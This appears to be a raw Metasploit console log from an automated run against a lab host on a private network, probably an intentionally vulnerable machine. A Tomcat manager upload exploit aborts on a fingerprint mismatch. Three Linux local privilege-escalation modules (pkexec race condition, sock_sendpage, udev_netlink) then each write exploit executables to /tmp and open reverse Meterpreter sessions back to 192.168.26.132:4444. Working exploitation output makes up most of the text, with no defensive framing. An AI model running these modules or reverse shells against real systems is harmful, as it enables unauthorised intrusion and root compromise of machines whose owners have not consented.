  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
Exploit completed, but no session was created.
Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-4094

       Name: Apache Tomcat Manager Authenticated Upload Code Execution
     Module: exploit/multi/http/tomcat_mgr_upload
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  rangercha

Available targets:
  Id  Name
  --  ----
  0   Java Universal
  1   Windows Universal
  2   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password for the specified username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.26.134   yes       The target address
  RPORT      80               yes       The target port
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
  USERNAME                    no        The username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that
  have an exposed "manager" application. The payload is uploaded as a WAR
  archive containing a jsp application using a POST request against the
  /manager/html/upload component. NOTE: The compatible payload sets vary
  based on the selected target. For example, you must select the Windows
  target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
Exploit completed, but no session was created.

PostExploit: exploit/linux/local/pkexec

       Name: Linux PolicyKit Race Condition Privilege Escalation
     Module: exploit/linux/local/pkexec
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2011-04-01

Provided by:
  xi4oyu
  0a29406d9794e4f9b30b3c5d6702c708

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x64

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  Count            500              yes       Number of attempts to win the race condition
  DEBUG_EXPLOIT    false            yes       Make the exploit executable be verbose about what it's doing
  ListenerTimeout  60               yes       Number of seconds to wait for the exploit
  SESSION          3                yes       The session to run this module on.
  WritableDir      /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  A race condition flaw was found in the PolicyKit pkexec utility and polkitd
  daemon. A local user could use this flaw to appear as a privileged user to
  pkexec, allowing them to execute arbitrary commands as root by running those
  commands with pkexec. Those vulnerable include RHEL6 prior to
  polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to
  0.96-2ubuntu1.1 (10.10), 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1
  (9.10)

References:
  http://cvedetails.com/cve/2011-1485/
  https://www.exploit-db.com/exploits/17942
  http://www.osvdb.org/72261

Started reverse TCP handler on 192.168.26.132:4444
Writing exploit executable to /tmp/ZLAbtXFF (4346 bytes)
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Starting the payload handler...
Meterpreter session 5 opened (192.168.26.132:4444 -> 192.168.26.134:34367) at 2016-05-31 16:59:15 +0100
Session 5 created in the background.

PostExploit: exploit/linux/local/sock_sendpage

       Name: Linux Kernel Sendpage Local Privilege Escalation
     Module: exploit/linux/local/sock_sendpage
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-08-13

Provided by:
  Tavis Ormandy
  Julien Tinnes
  spender
  rcvalle
  egypt

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  DEBUG_EXPLOIT  false            yes       Make the exploit executable be verbose about what it's doing
  SESSION        3                yes       The session to run this module on.
  WritableDir    /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  The Linux kernel failed to properly initialize some entries in the
  proto_ops struct for several protocols, leading to NULL being dereferenced
  and used as a function pointer. By using mmap(2) to map page 0, an attacker
  can execute arbitrary code in the context of the kernel. Several public
  exploits exist for this vulnerability, including spender's
  wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. All Linux
  2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to
  and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4

References:
  http://cvedetails.com/cve/2009-2692/
  http://www.osvdb.org/56992
  http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html

Started reverse TCP handler on 192.168.26.132:4444
Writing exploit executable to /tmp/Zd6rJIzA (4069 bytes)
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Meterpreter session 6 opened (192.168.26.132:4444 -> 192.168.26.134:34368) at 2016-05-31 16:59:38 +0100
Session 6 created in the background.

PostExploit: exploit/linux/local/udev_netlink

       Name: Linux udev Netlink Local Privilege Escalation
     Module: exploit/linux/local/udev_netlink
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-04-16

Provided by:
  kcope
  Jon Oberheide
  egypt

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x64

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  NetlinkPID                    no        Usually udevd pid-1. Meterpreter sessions will autodetect
  SESSION      3                yes       The session to run this module on.
  WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  Versions of udev < 1.4.1 do not verify that netlink messages are coming
  from the kernel. This allows local users to gain privileges by sending
  netlink messages from userland.

References:
  http://cvedetails.com/cve/2009-1185/
  http://www.osvdb.org/53810
  http://www.securityfocus.com/bid/34536

Started reverse TCP handler on 192.168.26.132:4444
Attempting to autodetect netlink pid...
Meterpreter session, using get_processes to find netlink pid
udev pid: 2341
Found netlink pid: 2340
Writing payload executable (155 bytes) to /tmp/lePgIJrQQu
Writing exploit executable (1879 bytes) to /tmp/LLxUGIieWE
chmod'ing and running it...
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Meterpreter session 7 opened (192.168.26.132:4444 -> 192.168.26.134:34369) at 2016-05-31 17:00:04 +0100
Session 7 created in the background.